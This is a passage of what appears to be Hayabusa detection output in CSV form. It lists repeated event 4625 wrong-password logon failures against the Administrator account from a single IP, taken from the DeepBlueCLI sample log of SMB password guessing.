NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: 